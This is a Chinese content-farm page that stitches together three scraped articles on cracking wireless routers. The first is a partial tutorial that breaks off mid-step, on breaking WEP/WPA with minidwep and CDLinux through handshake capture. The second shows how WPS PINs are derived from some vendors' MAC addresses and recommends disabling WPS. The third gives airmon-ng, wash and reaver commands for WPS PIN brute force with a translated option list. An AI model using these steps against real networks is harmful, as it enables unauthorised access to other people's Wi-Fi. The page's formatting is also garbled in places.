如何写论文?写好论文?免费论文网提供各类免费论文写作素材!
当前位置:免费论文网 > 美文好词 > 优质好文 > pin码破解无线路由

pin码破解无线路由

来源:免费论文网 | 时间:2017-05-15 07:43 | 移动端:pin码破解无线路由

篇一:路由器Pin码破解

你们家用的无线路由器安全吗?有人蹭网吗?无线路由器的漏洞在哪里?这么避免蹭网? 想要了解这些,必须要了解加密以及破解原理。 ? ?

?

? 电脑 足够多足够好的wifi信号源 usb无线网卡(非必需) 一点点耐心

1. 1

普通无线加密及破解的分类:

1、wep加密:此类加密比较老旧,非常不安全,十分容易被破解,现在的无线路由器已经抛弃了此类加密方式。

2、PWA/WPA2 PSK加密。这类加密按道理来说是很安全的,但是由于很多路由器为了方便用户上网,设置了QSS快速连接功能(或者叫WPS功能)。今天的重点就是在这里。

END

破解方法

1. 1

wep信号的破解

这类加密非常不安全,如果你家路由器用的这种加密方式,请立即更换。 破解WEP加密的无线信号,依赖两个因素。

第一、信号强度

第二、是否有在线客户端

2. 2

如果信号强,也有客户端在线,通过wep破解工具,十分钟的事情。这类破解是通过抓包,注入,然后获取密码,只要有这类信号,100%可以破。 工具自己找,wifite,minidwep

这两个工具都是Linux下的,但是这不是今天的重点,需要的可以根据后面的教程灵活运用。

3. 3

破解WPA加密的wifi信号。

WPA信号分两种,一种是早期的,没有WPS功能,另外一种是2012年以前的路由器,支持WPS功能,及QSS功能。

看看你家路由器背后,是否有QSS标记,如果有,就要小心了。

4. 4

WPA的wifi密码破解分两种方法,一种是传说中的抓包,一种是跑Pin码。

5. 5

破解要用到的工具:

1、Linux环境(推荐使用CDLinux,下载地址自己搜索,小巧,方便,集成工具多)

2、外置无线网卡

3、空置U盘

6. 6

破解方法有几种:方法虽然不同,但是破解过程和步骤是一致的,所以我先说方法,再说步骤。)(有很多更猛的方法,但是都是命令行界面的,老实说,有图形界面的而且可以用的,我就不喜欢钻研命令行界面的方法了,即便那些方法再牛逼)

1、将Linux环境通过软碟通(UltraISO)刻录到U盘(方法网上有,偷懒的直接搜索关键字”如何用软碟通(UltraISO)制作UbunutKylin启动U盘”这个也是我写的经验,将教程中的iso文件换为CDLinux的iso写入到U盘就可以了),通过U盘引导电脑进入Linux环境进行破解。

2、在Windows环境下,安装一个虚拟机,通过虚拟机运行Linux环境。虚拟机的安装和使用,应该不成问题,又需要的,自己百度,或者联系我吧。

3、自己安装一个Linux系统(适用于有点Linux基础的)比如BT系列,Kali,或者最常见的Ubuntu,然后自己安装破解工具,比如minidwep,wifite,打气筒,奶瓶之类的。

END

抓包破解WPA加密的WIFI信号

1. 1

抓包破解,从理论上讲,是100%可以破解的。

2. 2

先讲一下抓包的原理:

wifi信号是加密的,如果你要登陆无线路由器,就要给路由器发送一个请求,请求和无线路由器建立连接,这个请求就是一个包,学名叫握手包,这个包里面包含了你发送过去的一个密码,但是这个密码是加密的。 3. 3 抓包破解的成功与否,取决于以下五个方面: 1、信号强度; 2、是否有客户端在线;

3、跑包的机器是否足够强大;

4、字典是否好用

5、运气

4. 4

开始抓包,抓包工具使用minidwep吧,这个工具能抓包,也能跑pin。 进入CDLinux环境后,点击minidwep-gtk,软件会有一个提示,如图:

5.

5

此时需要把外置网卡挂载到虚拟机里面,如果是用U盘引导系统进行破解的,忽略这个步骤:

点击“虚拟机”-“可移动设备”-“你的无线卡”--“连接”此时无线网卡才挂在到了虚拟机里面,才能正常使用。

软件打开后,左上角会显示识别出来的网卡,点击扫描,开始搜索附近的无线信号。

6. 6

篇二:两小时破译无线路由器PIN码算法获得路由密码网络安全

网络安全:两小时破译无线路由器PIN码算法获得路由密码 作者:admin 时间:2012-4-22 21:20:20 浏览

:15405

扫瞄附近的无线信号

通过一些WIFI无线信号嗅探软件就可以轻松的破译开启了WPS功能的无线路由器密码。我们随便扫瞄了办公室附近一片区域的无线信号,它们的MAC地址、SSID名称、信号强度、设备品牌、无线加密方式、无线速率全部历历在目。图谱上那部被我们点选的无线路由器正是深圳某达的产品。

扫瞄附近的无线信号

破译无线路由器PIN码算法

路由器后面的贴现上都会标注PIN码 这是一台我们从网上COPY到的该厂商同类产品图片,它背后的贴纸上清楚的标明它的MAC地址、WPS快速连网PIN码。我们现在就简单的给大家演示一下操作过程。我们之前已说过,可以通过嗅探空气中的WIFI数据包直接抓获对方无线路由器的MAC地址,接下来我们就试试用这个图片上的MAC来计算它的WPS快速无线联网的PIN码。

用计算器转换16进制到10进制 MAC地址为:00:B0:0C:05:5A:D8。我们打开电脑的计算器小工具,切换到科学计算器模式"WIN7后是程序员模式"。在16进制下输入它尾部的最后6位字符、

055AD8

获得正确的PIN码 再把输入的十六进制切换成十进制字符。就能得到一组6位的数字,而这组350936正好是上图那台无线路由WPS码的前6位,最后一位数字,我们只要猜十次就可以把它猜出来。上帝如果给你关上了一扇门,那他一定会在另一个地方打开一扇窗。业界认识曾是坚不可摧的WAP2加密模式,就这样被一个意外的窗口给打开了。 不过幸运的是此次PIN码算法被解密涉及的MAC地址段不多,只有MAC地址前6位是C83A35或者00B00C的产品。其它产品线还只能用穷举法去计算。而这也需要时间,但用户可以在无线路由器里关闭WPS功能来禁止这一道暗门被盗用。 如何防止入侵:关闭WPS功能 上文的路由被破解,入侵入口是WPS,因此,关闭WPS

功能,便可有效预防此类攻击。

WPS,Wi-Fi Protected Setup简称,是Wi-Fi联盟推广的在无线网络里使用PIN密码或按键来快速设定网络安全的方法。它主要致力于简化无线网络设置及无线网络加密等工作。 PIN码。PIN码做为个人识别码,它是两台无线设备“握手”时的身份证明。网络上已大量有“奶瓶”“cdlinux“等排序破译PIN码工具(无线蹭网:奶瓶软件轻松破解WAP/WAP2格式密码)。 目前无线路由器的WPA2加密方式还是安全的,用户只需要关闭WPS功能就能避免这一后门被利用。可以在无线路由器的配置选项中对它进行设置。 如何防止入侵:关闭WPS功能

相关链接

启用WEP/WAP协议无线加密,让无线网络更安全

网络安全,是永恒不变的话题,也是时刻值得关注的问题,更是一个值得深入研究的课题。

篇三:BackTrack5利用路由PIN码破解无线路由WPA2密钥

BackTrack5利用路由PIN码破解无线路由WPA2密钥

[日期:2012-12-08] 来源:Linux社区 作者:rainmote [字体:大 中 小]

BackTrack5利用路由PIN码破解无线路由WPA2密钥

airmon-ng start wlan0 //将无线网卡设置为监控模式

airodump-ng -i mon0 //获得周围无线路由信息

wash -i mon0 -C//查看支持PIN码破解的无线路由

reaver -i mon0 -b 路由MAC地址 -S -a -p 路由PIN码 -vv //开始PIN破解

Reaver v1.4的参数说明

-i, --interface=<wlan> Name of the monitor-mode interface to use

网卡的监视接口,通常是mon0

-b, --bssid=<mac>BSSID of the target AP

AP的MAC地址

Optional Arguments:

-m, --mac=<mac> MAC of the host system

指定本机MAC地址,在AP有MAC过滤的时候需要使用

-e, --essid=<ssid>ESSID of the target AP

路由器的ESSID,一般不用指定

-c, --channel=<channel> Set the 802.11 channel for the interface (implies -f)

信号的频道,如果不指定会自动扫描

-o, --out-file=<file> Send output to a log file [stdout]

标准输出到文件

-s, --session=<file> Restore a previous session file

恢复进程文件

-C, --exec=<command> Execute the supplied command upon successful pin recovery

pin成功后执行命令

-D, --daemonize Daemonize reaver

设置reaver成Daemon

-a, --auto Auto detect the best advanced options for the target AP

对目标AP自动检测高级参数

-f, --fixedDisable channel hopping

禁止频道跳转

-5, --5ghz Use 5GHz 802.11 channels

使用5G频道

-v, --verbose Display non-critical warnings (-vv for more)

显示不重要警告信息 -vv 可以显示更多

-q, --quietOnly display critical messages

只显示关键信息

-h, --help Show help

显示帮助

Advanced Options:

-p, --pin=<wps pin> Use the specified 4 or 8 digit WPS pin

直接读取psk

-d, --delay=<seconds> Set the delay between pin attempts [1]

pin间延时,默认1秒,推荐设0

-l, --lock-delay=<seconds> Set the time to wait if the AP locks WPS pin attempts [60]

AP锁定WPS后等待时间

-g, --max-attempts=<num> Quit after num pin attempts

最大pin次数

-x, --fail-wait=<seconds> Set the time to sleep after 10 unexpected failures [0]

10次意外失败后等待时间,默认0秒

-r, --recurring-delay=<x:y> Sleep for y seconds every x pin attempts

每x次pin后等待y秒

-t, --timeout=<seconds>Set the receive timeout period [5]

收包超时,默认5秒

-T, --m57-timeout=<seconds> Set the M5/M7 timeout period [0.20]

M5/M7超时,默认0.2秒

-A, --no-associate Do not associate with the AP (association must be done by another application)

不连入AP(连入过程必须有其他程序完成)

-N, --no-nacks Do not send NACK messages when out of order packets are received

不发送NACK信息(如果一直pin不动,可以尝试这个参数)

-S, --dh-small Use small DH keys to improve crack speed

使用小DH关键值提高速度(推荐使用)

-L, --ignore-locks Ignore locked state reported by the target AP

忽略目标AP报告的锁定状态

-E, --eap-terminate Terminate each WPS session with an EAP FAIL packet

每当收到EAP失败包就终止WPS进程

-n, --nackTarget AP always sends a NACK [Auto]

对目标AP总是发送NACK,默认自动

-w, --win7Mimic a Windows 7 registrar [False]

模拟win7注册,默认关闭


pin码破解无线路由》由:免费论文网互联网用户整理提供;
链接地址:http://www.csmayi.cn/meiwen/38446.html
转载请保留,谢谢!
相关文章